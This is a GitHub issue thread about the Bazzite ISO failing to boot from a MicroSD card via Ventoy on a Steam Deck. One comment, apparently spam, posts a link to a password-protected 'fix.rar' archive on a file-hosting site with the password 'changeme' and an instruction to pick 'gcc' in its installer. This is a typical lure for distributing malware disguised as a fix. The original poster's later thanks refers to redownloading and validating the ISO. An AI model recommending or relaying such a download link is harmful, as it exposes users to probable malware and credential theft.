### ISSUE TITLE
Steam Deck LCD: Can’t boot bazz-deck.iso from SDcard via Ventoy 

### ISSUE THREAD

**Issue by ahydronous** [ublue-os/bazzite#1555]
### Describe the bug

Trying to boot the Bazzite ISO from MicroSD either via normal Ventoy or grub Ventoy mode results in the screen blinking black for a second before dropping back into Ventoy

### What did you expect to happen?

The bazzite ISO should boot from MicroSD like Windows or other LiveCD ISOs. 

### Output of `rpm-ostree status`

```shell
-
```

### Hardware

Steam Deck 256GB

**Comment by 13a10D** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ahydronous** [comment]
Thank you, after redownloading and validating, it worked!
